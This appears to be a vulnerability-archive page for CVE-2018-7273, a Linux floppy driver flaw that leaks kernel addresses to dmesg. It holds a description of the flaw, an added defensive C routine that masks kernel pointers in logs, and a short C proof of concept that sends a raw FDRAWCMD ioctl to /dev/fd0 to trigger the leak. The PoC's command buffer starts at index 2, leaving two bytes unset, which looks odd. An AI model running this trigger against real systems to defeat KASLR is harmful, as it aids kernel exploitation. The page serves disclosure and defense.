CVE-2018-7273 PoC — Linux kernel security vulnerability

Associated Vulnerability
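Title: Linux kernel security vulnerability (CVE-2018-7273)
Description: The Linux kernel is the kernel used by Linux, the open-source operating system released by the Linux Foundation (USA). Linux kernel 4.15.4 and earlier contain a security vulnerability that stems from the floppy driver using printk calls to display the addresses of in-memory functions and global variables. An attacker can exploit this to read the information in dmesg and use those addresses to learn the location of kernel code and data, bypassing security protections such as KASLR.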
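The following C routine is an added example, not part of the original page or the PoC. It masks values that look like kernel addresses in log lines before they are stored or forwarded, which is the class of data this CVE exposes through dmesg. The x86_64 threshold 0xffffffff80000000, the function names and the sample lines are assumptions constructed for illustration, not real driver output.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumption: x86_64, where kernel text and modules are mapped in the top
 * 2 GiB of the address space (0xffffffff80000000 and above). */
#define KERNEL_TOP_2G 0xffffffff80000000ULL

/* Return 1 if s starts with exactly 16 hex digits whose value is at or
 * above the threshold. s must be NUL-terminated. */
static int is_kernel_ptr(const char *s) {
    char buf[17];
    for (int i = 0; i < 16; i++) {
        if (!isxdigit((unsigned char)s[i])) return 0;
        buf[i] = s[i];
    }
    if (isxdigit((unsigned char)s[16])) return 0; /* longer hex run, e.g. a hash */
    buf[16] = '\0';
    return strtoull(buf, NULL, 16) >= KERNEL_TOP_2G;
}

/* Overwrite each kernel-address-looking token in line with 'X' (in place)
 * and return how many were masked. */
int redact_kernel_ptrs(char *line) {
    int hits = 0;
    size_t len = strlen(line);
    for (size_t i = 0; i + 16 <= len; i++) {
        if (i > 0 && isxdigit((unsigned char)line[i - 1])) continue; /* mid-token */
        if (is_kernel_ptr(line + i)) {
            memset(line + i, 'X', 16);
            hits++;
            i += 15; /* skip the masked token */
        }
    }
    return hits;
}

int main(void) {
    /* Constructed sample lines, not real floppy driver output. */
    char raw[]   = "[   42.100000] floppy0: handler=ffffffff9a3c1d20 data=0xffffffffc0a81000";
    char other[] = "[   42.100001] floppy0: handler=00000000a1b2c3d4"; /* below threshold */
    int n = redact_kernel_ptrs(raw);
    printf("%d masked: %s\n", n, raw);
    n = redact_kernel_ptrs(other);
    printf("%d masked: %s\n", n, other);
    return 0;
}
```

On a live system, setting the kernel.dmesg_restrict sysctl to 1 keeps unprivileged users from reading the kernel log at all.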
Readme
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <linux/kernel.h>
#include <string.h>
#include <sys/mman.h>
#include <linux/fd.h>

/* Shift the head number into bit 2 of the drive/head select byte (drive bits stay 0). */
static int drive_selector(int head) {
    return (head << 2);
}

/* Submit a raw command to the floppy controller through the FDRAWCMD ioctl. */
void fd_recalibrate(int fd) {
    struct floppy_raw_cmd raw_cmd;
    int tmp;

    raw_cmd.flags = FD_RAW_INTR;
    /* cmd_count starts at 2, so cmd[0] and cmd[1] are left unset and the
       two bytes below land in cmd[2] and cmd[3]; cmd_count ends at 4. */
    raw_cmd.cmd_count = 2;

    // set up the command
    raw_cmd.cmd[raw_cmd.cmd_count++] = 0x07;              // FDC recalibrate opcode
    raw_cmd.cmd[raw_cmd.cmd_count++] = drive_selector(0);
    tmp = ioctl(fd, FDRAWCMD, &raw_cmd);
    printf("Status:%d\n", tmp);
}

int main() {
    int fd;

    printf("Start\n");
    fd = open("/dev/fd0", O_RDWR | O_NDELAY);
    if (fd < 0) {
        perror("open /dev/fd0");
        return 1;
    }
    fd_recalibrate(fd);
    close(fd);
    printf("End\n");
    return 0;
}
File Snapshot

[4.0K] /data/pocs/9089e7553d56626b3265a2b741925491b0cbb6f5
└── [1014] README.md

0 directories, 1 file